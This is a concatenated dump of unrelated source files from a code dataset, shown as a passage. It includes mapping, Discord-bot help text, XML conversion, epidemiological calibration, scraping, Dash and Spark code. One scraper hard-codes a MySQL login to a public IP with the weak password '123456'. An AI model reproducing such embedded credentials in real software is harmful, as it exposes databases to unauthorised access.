fg_pp.add_child(folium.GeoJson(data=open('world.json', 'r',\n encoding='utf-8-sig').read(),\n style_function=lambda x: {'fillColor': 'green'\n if x['properties']['POP2005'] < 10000000\n else 'orange' if 10000000 <= x['properties']['POP2005'] < 20000000\n else 'red'}))\n\n my_map.add_child(lines)\n my_map.add_child(fg)\n my_map.add_child(fg_pp)\n my_map.add_child(folium.LayerControl())\n\n my_map.save(\"map.html\")\n\n\ndef main():\n \"\"\" Main function that runs the module \"\"\"\n year = int(input(\"Please, enter a year: \"))\n latitude = float(input(\"Enter latitude: \"))\n longitude = float(input(\"Enter longitude: \"))\n my_coords = tuple([latitude, longitude])\n\n txt_file = \"local.txt\"\n\n films_with_correct_year = find_year(file_prepocessing(\"local.txt\"), year)\n\n films_with_correct_year_coords = add_coords(films_with_correct_year)\n\n nearest_films = find_places(films_with_correct_year_coords, my_coords)\n\n places = place_on_map(nearest_films, my_coords)\n\n return places\n\n\nif __name__ == \"__main__\":\n main()\n print(\" Check your map on map.html \")\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"161784149","text":"from util.containers import HelpForm as form\n\n\nbackup = form('`{}backup`\\n'\n 'Backup all bots to file.')\n\ndelet = form('`{}delet [server id] [channel id] [message id]`\\n'\n 'Do a delet')\n\ninvite = form('`{}invite`\\n'\n 'Returns bot\\'s invite link.')\n\nprefix = form('`{0}prefix`\\n'\n '`{0}prefix [prefix]`\\n'\n 'Get or set bot prefix.')\n\nregen = form('`{}regen`\\n'\n 'Restart bot script.')\n\nrepl = form('`{}repl [optional:@member]`\\n'\n 'Opens a Python REPL. Available args are `ctx` and `member` if passed.')\n\nsayd = form(\"`{0}sayd [message]`\\n\"\n \"`{0}sayd [args]`\\n\"\n \"Sayd (say-delete) says a message, then \"\n \"deletes your command. Args should be space \"\n \"separated and subargs comma-separated. Use \"\n \"a `:` to denote the start of an arg. Arg list:\\n\"\n \"`init - title,desc,url,colour`\\n\"\n \"`footer - text,icon_url`\\n\"\n \"`image - url`\\n\"\n \"`thumbnail - url`\\n\"\n \"`author - name,url,icon_url`\\n\"\n \"`field - name,value,inline`\\n\"\n \"Example:\\n\"\n \"```python\\n\"\n \"{0}sayd embed init:title=SampleEmbed,desc=\\\"a \"\n \"description\\\",color=0xff0000 field:name=\\\"One \"\n \"field\\\",value=things field:name=\\\"Two field\\\",\"\n \"value=\\\"more things\\\",inline=False\\n```\")\n\nsend = form('`{}send [channel id] [text]`\\n'\n 'Send a message to a channel.')\n\nserver = form(\"`{0}server [(bot name)/'this'] [(invite url)/'this'] [\"\n \"quote delay]`\\n\"\n \"Note: 'this' refers to bot/server this command is being executed from\\n\"\n \"Example: `{0}server add this this 3` adds current server to current bot with \"\n \"spam timer of 3 minutes\\n\"\n \"*Note: This command is deprecated, as servers are now added automagically. \"\n \"It remains for manual control in case of errors, but you shouldn't ever have \"\n \"to use it*\")\n\nserverid = form('`{}serverid`\\n'\n 'Get the server\\'s ID.')\n\nsleep = form('`{}sleep`\\n'\n 'Shutdown bot script.')\n\nwrite = form('`{}write`\\n'\n 'Writes all bots to file.')\n","sub_path":"help_args/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":2284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"77468027","text":"\"\"\"\n Description: Converts a given XML file(s) to Json(s) and writes than to the CWD\n :input param file(s) directory: Directory\n :input param json name: Output json name + extention\n\n Author: Miguel Rodriguez Extended functionality\n\n\"\"\"\n\nimport json\nimport os\n\nfrom lxml import etree\n\ndef xml_to_json(xml_input, json_output):\n '''Converts an xml file to json.'''\n dict_to_json(etree_to_dict(xml_to_etree(xml_input), True), json_output)\n\ndef xml_to_etree(xml_input):\n '''Converts xml to a lxml etree.'''\n f = open(xml_input, 'r')\n xml = f.read()\n f.close()\n return etree.HTML(xml)\n\ndef etree_to_dict(tree, only_child):\n '''Converts an lxml etree into a dictionary.'''\n mydict = dict([(item[0], item[1]) for item in tree.items()])\n children = tree.getchildren()\n if children:\n if len(children) > 1:\n mydict['children'] = [etree_to_dict(child, False) for child in children]\n else:\n child = children[0]\n mydict[child.tag] = etree_to_dict(child, True)\n if only_child:\n return mydict\n else:\n return {tree.tag: mydict}\n\ndef dict_to_json(dictionary, json_output):\n '''Coverts a dictionary into a json file.'''\n directory = os.getcwd() + '/resultsJson/'\n fullpath = os.path.join(directory, json_output)\n f = open(fullpath, 'w')\n f.write(json.dumps(dictionary, sort_keys=True, indent=4))\n f.close()\n\ndef main():\n directory = os.getcwd() + '/newmultiview/exp_visualization/SciAnalysis/results/'\n\n count = 0\n\n for filename in os.listdir(directory):\n if filename.endswith(\".xml\"):\n print('Converting XML file to Json...')\n\n jsonName = filename + '.json'\n xml_to_json(directory + filename, jsonName)\n else:\n print('File extention is not XML!')\n print(\"\"\"'All XML files in the given directory were successfully converted into their Json's counterparts!\"\"\")\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"app/dev/xml2json.py","file_name":"xml2json.py","file_ext":"py","file_size_in_byte":1967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"420256967","text":"# !/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf-8')\nimport string\nimport re\nimport io\nimport os\nimport json\n\n\nstationList = \"guangzhou.json\"\n\nTEMPLATE = \"station_template.conf\"\n\ndataConf = \"station.conf\"\n\nsourceFile = \"stationList.txt\"\n\nfinalList = \"finalGZ.json\"\n\ncmd = \"canary --project pr_search -U http://dispatcher.is.autonavi.com/dispatcher -L 3 --file station.conf -> stationList.txt\"\n\ndef generateDataConf(stationList,TEMPLATE,dataConf):\n\t\n # Read source json file\n masterDataFile = open(stationList, \"r\") \n dataEntries = json.load(masterDataFile)\n destinationFile = io.open(dataConf, \"w\", encoding='utf-8')\n\n for dataEntry in dataEntries:\n # print(dataEntry[\"name\"])\n # print(\"\\n\")\n templateFile = open(TEMPLATE, \"r\") \n template = templateFile.read()\n \n # Replace \n template = template.replace(\"\", dataEntry[\"name\"])\n\n destinationFile.write(unicode(template))\n destinationFile.write(unicode(\"\\n\\n\"))\n\n templateFile.close()\n\n destinationFile.close()\n\ndef updateList(stationList,sourceFile,finalList):\n\n fileOut = io.open(finalList,'w')\n\n name = []\n muid = []\n with open(sourceFile, 'r') as f:\n for line in f.readlines():\n line = line.strip()\n if re.match(r'__search_string__ = 虫雷 岗地铁站', line):\n name.append(\"虫雷 岗地铁站\")\n muid.append(\"\")\n elif re.match(r'^__search_string__', line):\n # print(line.split('=')[1].strip())\n name.append(line.split('=')[1].strip())\n elif re.match(r'^muid', line):\n muid.append(line.split(':')[1].strip())\n\n obj = []\n\n for i in range(len(name)):\n item = {}\n item[\"name\"] = name[i].decode(\"utf-8\")\n item[\"muid\"] = muid[i].decode(\"utf-8\")\n obj.append(item)\n\n with open(stationList, 'r') as j:\n final = json.load(j)\n for i in final:\n for j in obj:\n if i[\"name\"] == j[\"name\"]:\n i['muid'] = j['muid']\n\n fileOut.write(json.dumps(final, sort_keys=True, indent=4, separators=(',', ': '), ensure_ascii=False))\n\nif __name__ == \"__main__\":\n\n generateDataConf(stationList,TEMPLATE,dataConf)\n os.system(cmd)\n updateList(stationList,sourceFile,finalList)","sub_path":"maps_eval/scrap_caboose/guangzhou/muid.py","file_name":"muid.py","file_ext":"py","file_size_in_byte":2406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"584242364","text":"import numpy as np\n\nfrom autumn.tools.project import Project, ParameterSet, TimeSeriesSet, build_rel_path, get_all_available_scenario_paths, use_tuned_proposal_sds\nfrom autumn.tools.calibration import Calibration\nfrom autumn.tools.project.params import read_yaml_file\nfrom autumn.tools.calibration.priors import UniformPrior, TruncNormalPrior\nfrom autumn.tools.calibration.targets import NormalTarget, PoissonTarget, TruncNormalTarget\nfrom autumn.models.covid_19 import base_params, build_model\nfrom autumn.settings import Region, Models\nimport os\n\n\nCLUSTERS = [Region.to_filename(r) for r in Region.VICTORIA_SUBREGIONS]\n\n# Just calibrate to June, July, August and September for now (but run for some lead in time at the start)\nTARGETS_START_TIME = 153 # 1st June\nTARGETS_END_TIME = 305 # 31st October\nTARGETS_RANGE = (TARGETS_START_TIME, TARGETS_END_TIME)\n\n# Load and configure model parameters\ndefault_path = build_rel_path(\"params/default.yml\")\nmle_path = build_rel_path(\"params/mle-params.yml\")\nscenario_dir_path = build_rel_path(\"params/\")\nscenario_paths = get_all_available_scenario_paths(scenario_dir_path)\nbaseline_params = base_params.update(default_path).update(mle_path, calibration_format=True)\nscenario_params = [baseline_params.update(p) for p in scenario_paths]\nparam_set = ParameterSet(baseline=baseline_params, scenarios=scenario_params)\n\n# Add calibration targets and priors\nts_set = TimeSeriesSet.from_file(build_rel_path(\"targets.secret.json\"))\n\n# For all the cluster targets, a universal calibrated parameter called \"target_output_ratio\" is used to scale the\n# dispersion parameter of the targets' normal likelihoods.\ncluster_targets = []\nfor cluster in CLUSTERS:\n notifs_ts = ts_set.get(f\"notifications_for_cluster_{cluster}\").moving_average(4)\n target = NormalTarget(notifs_ts)\n cluster_targets.append(target)\n\n# Request calibration targets\ntargets = [\n PoissonTarget(ts_set.get(\"notifications\").truncate_times(*TARGETS_RANGE).round_values()),\n PoissonTarget(ts_set.get(\"infection_deaths\").truncate_times(*TARGETS_RANGE).moving_average(7)),\n PoissonTarget(ts_set.get(\"hospital_admissions\").truncate_times(*TARGETS_RANGE)),\n PoissonTarget(ts_set.get(\"icu_admissions\").truncate_times(*TARGETS_RANGE)),\n *cluster_targets,\n]\n\n# Add multiplier for most services, except use South Metro for South East Metro, use North Metro for West Metro\ncluster_priors = []\nregions_for_multipliers = [\n reg for reg in Region.VICTORIA_METRO if reg not in (Region.SOUTH_EAST_METRO, Region.WEST_METRO)\n]\nregions_for_multipliers.append(Region.BARWON_SOUTH_WEST)\n\nfor region in regions_for_multipliers:\n region_name = region.replace(\"-\", \"_\")\n name = f\"victorian_clusters.contact_rate_multiplier_{region_name}\"\n # Shouldn't be too peaked with these values.\n prior = TruncNormalPrior(name, mean=1.0, stdev=0.5, trunc_range=[0.5, np.inf], jumping_stdev=0.15)\n cluster_priors.append(prior)\n\npriors = [\n # Global COVID priors, but with jumping sds adjusted\n TruncNormalPrior(\n \"sojourn.compartment_periods_calculated.exposed.total_period\",\n mean=5.5,\n stdev=0.97,\n trunc_range=[1.0, np.inf],\n jumping_stdev=0.5,\n ),\n TruncNormalPrior(\n \"sojourn.compartment_periods_calculated.active.total_period\",\n mean=6.5,\n stdev=0.77,\n trunc_range=[4.0, np.inf],\n jumping_stdev=0.4,\n ),\n # Cluster specific priors.\n *cluster_priors,\n # Victorian regional priors.\n TruncNormalPrior(\n f\"victorian_clusters.contact_rate_multiplier_regional\",\n mean=1.0,\n stdev=0.5,\n trunc_range=[0.5, np.inf],\n jumping_stdev=0.15,\n ),\n UniformPrior(\"contact_rate\", [0.04, 0.07], jumping_stdev=0.008),\n UniformPrior(\"victorian_clusters.intercluster_mixing\", [0.005, 0.05], jumping_stdev=0.01),\n UniformPrior(\"infectious_seed\", [20., 70.], jumping_stdev=4.),\n UniformPrior(\"clinical_stratification.non_sympt_infect_multiplier\", [0.2, 0.8], jumping_stdev=0.05),\n UniformPrior(\"infection_fatality.top_bracket_overwrite\", [0.05, 0.3], jumping_stdev=0.04),\n UniformPrior(\"clinical_stratification.props.hospital.multiplier\", [0.5, 5.0], jumping_stdev=0.4),\n UniformPrior(\"testing_to_detection.assumed_cdr_parameter\", [0.2, 0.5], jumping_stdev=0.04),\n TruncNormalPrior(\n \"sojourn.compartment_periods.icu_early\",\n mean=12.7,\n stdev=4.0,\n trunc_range=[5.0, np.inf],\n jumping_stdev=4.\n ),\n UniformPrior(\n \"victorian_clusters.metro.mobility.microdistancing.behaviour_adjuster.parameters.effect\",\n [0.0, 0.6],\n jumping_stdev=0.075,\n ),\n UniformPrior(\n \"victorian_clusters.metro.mobility.microdistancing.face_coverings_adjuster.parameters.effect\",\n [0.0, 0.6],\n jumping_stdev=0.04,\n ),\n UniformPrior(\"target_output_ratio\", [0.2, 0.7], jumping_stdev=0.04),\n UniformPrior(\"contact_tracing.assumed_trace_prop\", [0.2, 0.5], jumping_stdev=0.04),\n]\n\n# Load proposal sds from yml file\nuse_tuned_proposal_sds(priors, build_rel_path(\"proposal_sds.yml\"))\n\ncalibration = Calibration(\n priors,\n targets,\n metropolis_init=\"current_params\",\n metropolis_init_rel_step_size=0.05,\n fixed_proposal_steps=500,\n jumping_stdev_adjustment=0.8,\n)\n\n# FIXME: Replace with flexible Python plot request API.\nimport json\n\nplot_spec_filepath = build_rel_path(\"targets.secret.json\")\nwith open(plot_spec_filepath) as f:\n plot_spec = json.load(f)\n\nproject = Project(\n Region.VICTORIA, Models.COVID_19, build_model, param_set, calibration, plots=plot_spec\n)\n\n# Write parameter table to tex file\nmain_table_params_list = [\n \"clinical_stratification.icu_prop\",\n \"sojourn.compartment_periods_calculated.exposed.total_period\",\n \"contact_rate\"\n]\n# project.write_params_to_tex(main_table_params_list, project_path=build_rel_path(''))\n\n\n# from autumn.tools.calibration.proposal_tuning import perform_all_params_proposal_tuning\n# perform_all_params_proposal_tuning(project, calibration, priors, n_points=100, relative_likelihood_reduction=0.2)\n","sub_path":"autumn/projects/covid_19/victoria/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":6084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"331242228","text":"def field_to_str(field, filename=None):\n \"\"\"\n list(list(str)), str -> None\n\n Prints field on the desktop or save in the file.\n \"\"\"\n chars = \"ABCDEFGHIJ\"\n field_str = \"+---\" * 11 + \"+\\n| |\"\n for i in range(len(chars)):\n field_str += \" \" + chars[i] + \" |\"\n field_str += \"\\n\" + \"+---\" * 11 + \"+\\n\"\n for line in range(len(field)):\n if line == 9:\n field_str += \"| \" + str(line + 1)\n else:\n field_str += \"| \" + str(line + 1) + \" \"\n for column in range(len(field[line])):\n field_str += \"| \" + field[line][column] + \" \"\n field_str += \"|\\n\" + \"+---\" * 11 + \"+\\n\"\n print(field_str)\n\n if filename:\n with open(filename, \"w\") as field_txt:\n for line in range(len(field)):\n for column in range(len(field[line])):\n field_txt.write(field[line][column])\n if line != 9:\n field_txt.write(\"\\n\")\n","sub_path":"lab1/field_to_str.py","file_name":"field_to_str.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"117965939","text":"#This approach makes use of the Python logging without any Fluentd provided logging \n# functionality. As a result we have fallen back to sending HTTP and using a custom\n# formatter to populate the values we would see through the configuration\nimport logging, logging.handlers\nimport datetime\ntestHandler = logging.handlers.HTTPHandler('localhost:18080', '/test', method='POST')\ncustom_format = {\n 'host': '%(hostname)s',\n 'where': '%(module)s.%(funcName)s',\n 'type': '%(levelname)s',\n 'stack_trace': '%(exc_text)s'\n}\nmyFormatter = logging.Formatter(custom_format)\ntestHandler.setFormatter(myFormatter)\n\nlog = logging.getLogger(\"test\")\nlog.addHandler(testHandler)\nnow = datetime.datetime.now().strftime(\"%d-%m-%Y %H-%M-%S\")\nlog.warning ('{\"from\":\"log-simple\", \"at\" :'+now+'\"}')","sub_path":"Chapter11/clients/log-simple.py","file_name":"log-simple.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"21337091","text":"# -*- coding:utf-8 -*-\r\n\r\nimport cv2\r\nimport numpy as np\r\n\r\ndef deNoise(filename):\r\n\timage = cv2.imread(filename)\r\n\tgray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\r\n\tmedian = cv2.medianBlur(gray, 3)\r\n\r\n\t# cv2.imshow('median',median)\r\n\t# cv2.waitKey()\r\n\t# Initiate the list \r\n\tbar = []\r\n\tfor i in range(256):\r\n\t\tbar.append(0)\r\n\r\n\t#Caculate the frequency of the gray value\r\n\trow, col = median.shape\r\n\tfor i in range(row):\r\n\t\tfor j in range(col):\r\n\t\t\tbar[median[i][j]] += 1\r\n\t\r\n\tmost = max(bar)\r\n\tlocation = bar.index(most)\r\n\tret2, thresh = cv2.threshold(median,location - 40,255,cv2.THRESH_BINARY)\r\n\r\n\tkernel = np.ones((2,2),np.uint8)\r\n\tdilation = cv2.dilate(thresh,kernel,iterations = 1)\r\n\treturn dilation","sub_path":"pre.py","file_name":"pre.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"392732084","text":"#한빛미디어 - store - 전체도서목록 정보를 스크래핑해서 Allbooks 테이블에 저장 (mysql)\n\nimport csv\nimport pymysql\nimport requests\nimport lxml.html\n\n#connection 생성\nconn = pymysql.connect(host='13.125.178.188', port=3306, user='my', password='123456', db='my', charset='utf8')\n\n#cursor 생성\nmycursor = conn.cursor()\n\nsqlDropT = 'DROP TABLE if exists allbooks;'\nsqlCreateT = 'create table allbooks(id int auto_increment, bookname varchar(200), booklink varchar(200),primary key (id))'\nsqlInsertT = 'insert into allbooks (bookname, booklink) values (%s, %s)'\nsqlCheckT = \"show tables like 'allbooks'\"\nIsCreate = mycursor.execute(sqlCheckT)\n\n# #DB 생성\n# if 'if exists(select * from allbooks where sno=1 )' == 1:\nmycursor.execute(sqlDropT)\n# else:\n# mycursor.execute(sqlCreateT)\n#\n# mycursor.execute(sqlCreateT)\n\n#크롤링으로 데이터를 가져오기\n#1 목표 url\nurl = 'http://www.hanbit.co.kr/store/books/full_book_list.html'\n\n#2 request & respnose를 통해 데이터 받아오기\nres = requests.get(url)\n\n#3 변수활용을 위해 받은 데이터를 텍스트로 저장\nhtml = res.text\n\n#4 텍스트 데이터를 파싱\nparsed_html = lxml.html.fromstring(html)\n\n#DB생성\nmycursor.execute(sqlCreateT)\n\nwith open('data/allbooks.csv', 'w', encoding='utf-8', newline='') as f:\n bookcsv = csv.writer(f)\n for part_html in parsed_html.xpath('//td[@class=\"left\"]/a'):\n #csv로 저장\n bookcsv.writerow([part_html.text_content(), 'http://www.hanbit.co.kr'+part_html.get('href')]) #중괄호 잊지 않기\n #MariaDB에 저장\n mycursor.execute(sqlInsertT, (part_html.text_content(), part_html.get('href')))\n print(part_html.text_content())\n\nsqlResult = 'select * from allbooks'\nmycursor.execute(sqlResult)\n\nconn.commit()\nconn.close()\n\n\n","sub_path":"py1810/hello_mysql_02.py","file_name":"hello_mysql_02.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"265983294","text":"import dash_core_components as dcc\nimport dash_html_components as html\nimport pandas as pd\n\ncolors = {\n 'background': '#111111',\n 'text': '#7FDBFF'\n}\n\n# Gapminder dataset GAPMINDER.ORG, CC-BY LICENSE\nurl = \"https://raw.githubusercontent.com/plotly/datasets/master/gapminderDataFiveYear.csv\"\ndf = pd.read_csv(url)\ndf = df.rename(index=str, columns={\"pop\": \"population\",\n \"lifeExp\": \"life_expectancy\",\n \"gdpPercap\": \"GDP_per_capita\"})\n\nlayout = html.Div([\n html.Div(style={'backgroundColor': colors['background']}, children=[\n html.H1(\n children='Hello Dash',\n style={\n 'textAlign': 'center',\n 'color': colors['text']\n }\n ),\n html.Div(children='Dash: A web application framework for Python.',\n style={\n 'textAlign': 'center',\n 'color': colors['text']\n }),\n dcc.Graph(\n id='Graph1',\n figure={\n 'data': [\n {'x': [1, 2, 3], 'y': [4, 1, 2], 'type': 'bar',\n 'name': 'SF'},\n {'x': [1, 2, 3], 'y': [2, 4, 5], 'type': 'bar',\n 'name': u'Montréal'},\n ],\n 'layout': {\n 'plot_bgcolor': colors['background'],\n 'paper_bgcolor': colors['background'],\n 'font': {\n 'color': colors['text']\n }\n }\n }\n )\n ]),\n html.H1('Stock Tickers'),\n dcc.Dropdown(\n id='my-dropdown',\n options=[\n {'label': 'Coke', 'value': 'COKE'},\n {'label': 'Tesla', 'value': 'TSLA'},\n {'label': 'Apple', 'value': 'AAPL'}\n ],\n value='COKE'\n ),\n dcc.Graph(id='my-graph'),\n dcc.Input(\n className=\"form-control\",\n id='my_input',\n placeholder='Enter a value...',\n type='text',\n value=''\n ),\n html.Div(id='my-div'),\n dcc.Dropdown(\n id='country-dropdown',\n options=[{'label': i, 'value': i} for i in df.country.unique()],\n multi=True,\n value=['Australia']\n ),\n\n dcc.Graph(id='timeseries-graph')\n], style={'width': '500'}, className=\"container\", )\n","sub_path":"app/dashapp2/layout.py","file_name":"layout.py","file_ext":"py","file_size_in_byte":2365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"535675772","text":"import pandas as pd\nimport numpy as np\nimport xlrd\n\n\nclass ChartData:\n def __init__(self):\n pass\n\n #处理表格文件数据得到收结案和地区信息,收结案可以看做矩阵\n def get_sja_data(self):\n sa_number = []\n ja_number = []\n region = []\n for i in range(1, 10):\n url = 'C:\\\\Users\\\\WSK\\\\PycharmProjects\\\\Django\\\\data\\\\sjayc\\\\df0' + str(i) + '.xlsx'\n excel = xlrd.open_workbook(url)\n sheet = excel.sheet_by_name('Sheet1')\n sa_data = sheet.col_values(3, 1)\n ja_data = sheet.col_values(2, 1)\n region = sheet.col_values(1, 1)\n region = [x+'区' for x in region]\n sa_number.append(sa_data)\n ja_number.append(ja_data)\n for i in range(10, 41):\n url = 'C:\\\\Users\\\\WSK\\\\PycharmProjects\\\\Django\\\\data\\\\sjayc\\\\df' + str(i) + '.xlsx'\n excel = xlrd.open_workbook(url)\n sheet = excel.sheet_by_name('Sheet1')\n sa_data = sheet.col_values(3, 1)\n ja_data = sheet.col_values(2, 1)\n sa_number.append(sa_data)\n ja_number.append(ja_data)\n return sa_number, ja_number, region\n\n #将收结案数据处理,得到2016-2019年的年数据\n def get_sjayear_data(self, sja_data):\n year_data = []\n for i in range(3):\n year_meta_data = [0 for x in range(len(sja_data[0]))]\n for j in range(12):\n k = j + 12 * i\n for l in range(len(sja_data[0])):\n year_meta_data[l] = year_meta_data[l] + sja_data[k][l]\n year_data.append(year_meta_data)\n year_meta_data = [0 for x in range(len(sja_data[0]))]\n for j in range(36, 40):\n for l in range(len(sja_data[0])):\n year_meta_data[l] = year_meta_data[l] + sja_data[j][l]\n year_data.append(year_meta_data)\n return year_data\n\n #得到地图数据\n def get_map_data(self, region, sa_number):\n map_data = []\n for i in range(len(region)):\n map_meta_data = {}\n map_meta_data['name'] = region[i]\n map_meta_data['value'] = sa_number[i]\n map_data.append(map_meta_data)\n return map_data\n\n #得到柱状图和地图年份数据,直接传回view\n def get_his_data(self):\n sa_number, ja_number, region = ChartData().get_sja_data()\n sa_data = ChartData().get_sjayear_data(sa_number)\n ja_data = ChartData().get_sjayear_data(ja_number)\n data = []\n for x in range(4):\n meta_data = {}\n meta_data['date'] = str(x+2016)\n meta_data['chart_region'] = region\n meta_data['chart_sa_number'] = sa_data[x]\n meta_data['chart_ja_number'] = ja_data[x]\n meta_data['map'] = ChartData().get_map_data(region, sa_data[x])\n data.append(meta_data)\n return data\n\n #得到地区分类的40个月数据\n def get_region_data(self):\n chart_date = [\n '2016-01-31', '2016-02-29', '2016-03-31', '2016-04-30',\n '2016-05-31', '2016-06-30', '2016-07-31', '2016-08-31',\n '2016-09-30', '2016-10-31', '2016-11-30', '2016-12-31',\n '2017-01-31', '2017-02-28', '2017-03-31', '2017-04-30',\n '2017-05-31', '2017-06-30', '2017-07-31', '2017-08-31',\n '2017-09-30', '2017-10-31', '2017-11-30', '2017-12-31',\n '2018-01-31', '2018-02-28', '2018-03-31', '2018-04-30',\n '2018-05-31', '2018-06-30', '2018-07-31', '2018-08-31',\n '2018-09-30', '2018-10-31', '2018-11-30', '2018-12-31',\n '2019-01-31', '2019-02-28', '2019-03-31'\n ]\n sa_number, ja_number, region = ChartData().get_sja_data()\n region_data = []\n for i in range(len(region)):\n region_meta_data = {}\n region_sa_number = []\n region_ja_number = []\n for j in range(len(sa_number)):\n region_sa_number.append(sa_number[j][i])\n region_ja_number.append(ja_number[j][i])\n region_meta_data['region'] = region[i]\n region_meta_data['chart_date'] = chart_date\n region_meta_data['chart_sa_number'] = region_sa_number\n region_meta_data['chart_ja_number'] = region_ja_number\n region_data.append(region_meta_data)\n return region_data\n\n#返回日期数据和地区数据\ndate_data = ChartData().get_his_data()\nregion_data = ChartData().get_region_data()\n\n\n\n","sub_path":"django_web/sjayc_data.py","file_name":"sjayc_data.py","file_ext":"py","file_size_in_byte":4532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"257885574","text":"from flask import Flask\nfrom flask import render_template, request, jsonify\nimport joblib\nimport json\nimport pandas as pd\n\napp = Flask(__name__)\n\n# load model\nmodel = joblib.load(\"../models/classifier.pkl\")\n\n# open parameters JSON file\nwith open('../models/parameters.json') as json_file:\n parameters = json.load(json_file)\n\n# open column json\nwith open('../models/columns.json') as json_file:\n columns = json.load(json_file)\n\n# setup webapp routes\n@app.route('/')\n@app.route('/index')\n\n# home page route\ndef index():\n return render_template('index.html', parameters=parameters)\n\n# view results route\n@app.route('/run')\ndef run():\n # create a dict object from request parameters\n house = request.args.to_dict(flat=True)\n\n # convert any number parameters to int\n for key in house.keys():\n type = parameters[key]['type']\n\n if type == 'number':\n house[key] = int(house[key])\n\n # create a dataframe from the parameter dict\n df = pd.DataFrame(house, index=[0])\n # create dummy variables for categorical features\n df = pd.get_dummies(df)\n # add missing columns and fill with 0\n df = df.reindex(columns=columns, fill_value=0)\n\n # use model to predict house price for query\n value = model.predict(df)[0]\n\n # render results\n return render_template(\n 'run.html',\n value=value\n )\n\ndef main():\n app.run(host='0.0.0.0', port=3001, debug=True)\n\nif __name__ == '__main__':\n main()\n","sub_path":"webapp/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"137041538","text":"from pyspark.sql.types import StructType, StructField, StringType\n\nimport pyspark.sql.functions as f\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\ndef build_input_data(ctx, input_data, prev_col_names, expected_fields):\n\n # create spark session and spark context\n ss = ctx.spark_session\n\n # Determine the existing schema\n logger.info(\"prev_col_names: \"+str(prev_col_names))\n\n validate = True\n\n # get object representing the filesystem of the input dataset\n fs = input_data.filesystem()\n raw_underlying_files = fs.files()\n ls_result = fs.ls()\n for fls in ls_result:\n logger.info(\"===== DEVELOPER fs: {}\".format(fls.path))\n\n logger.info(\"=== raw_not empty: {}\".format(raw_underlying_files.count() > 0))\n\n if raw_underlying_files.count() > 0:\n # create base file path of underlying files based on filesystem path\n base_file_path = (fs.hadoop_path + '/')\n\n logger.info(\"==== base path: {}\".format(base_file_path))\n\n # get list of objects representing each file underlying the input dataset\n filename_list = [r['path'] for r in raw_underlying_files.collect()]\n\n logger.info(\"===== filename_list: {}\".format(filename_list))\n\n all_col_names = set(prev_col_names)\n dfArray = []\n\n for filename in filename_list:\n logger.info(\"Reading \" + filename)\n full_file_path = base_file_path + filename\n curr_df = ss.read.format('csv').option('header', 'true').option(\n 'multiLine', 'true').option('delimiter', \",\").load(full_file_path)\n col_names = curr_df.columns\n all_col_names.update(col_names)\n dfArray.append(curr_df)\n\n logger.info(\"all_col_names: \"+str(all_col_names))\n\n masterDFComputed = []\n for df in dfArray:\n logger.info(\"processing dataframe\")\n for col in all_col_names:\n if col not in df.columns:\n logger.info(\"adding col \"+col)\n df = df.withColumn(col, f.lit(None))\n masterDFComputed.append(df)\n\n logger.info(\"len(masterDFComputed): \"+str(len(masterDFComputed)))\n\n all_col_names = sorted(all_col_names)\n if validate:\n full_schema = StructType([StructField(c, StringType(), True) for c in sorted(expected_fields)])\n else:\n full_schema = StructType([StructField(c, StringType(), True) for c in sorted(all_col_names)])\n\n master_df = ss.createDataFrame(data=[], schema=full_schema)\n\n # masterDFSorted = []\n for calc_df in masterDFComputed:\n calc_df = calc_df.select(all_col_names)\n master_df = master_df.union(calc_df)\n\n return master_df\n","sub_path":"latest_integration/transforms-python/src/python/pnl/typed/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"582940243","text":"\"\"\"\n Инициализатор модуля по сборке Worker'ов\n\n Метакласс, который собирает воркеры для дальнейшей работы.\n\"\"\"\n\n\nclass WorkerMeta(type):\n def __new__(cls, name, bases, dct):\n # Игнорируем родителя\n if name == 'WorkerCreator':\n # Метод __new__() обязан всегда вернуть класс\n return super(WorkerMeta, cls).__new__(cls, name, bases, dct)\n # Прописываем worker'у ключевой аргумент, останавливающий работу\n dct['keep_going'] = True\n # Создаем логгера, если пользователь задал его конфигурацию\n if \"logger_conf_name\" in dct:\n clog = {}\n clog['logger_name'] = dct.get(\"logger_conf_name\", name)\n clog['path_to_file'] = dct.get(\"logger_conf_path\", \"logs/\" + name + \".log\")\n clog['message_level'] = dct.get(\"logger_conf_level\", \"DEBUG\")\n clog['message_format'] = dct.get(\"logger_conf_format\", \"%(asctime)s - %(name)s - %(levelname)s - %(message)s\")\n from ..samples.loggers import logger_create # Импортируем создателя логгеров\n dct['logger'] = logger_create(clog) # Создаем логгер для этого модуля\n # Возвращаем готового worker'a\n return super(WorkerMeta, cls).__new__(cls, name, bases, 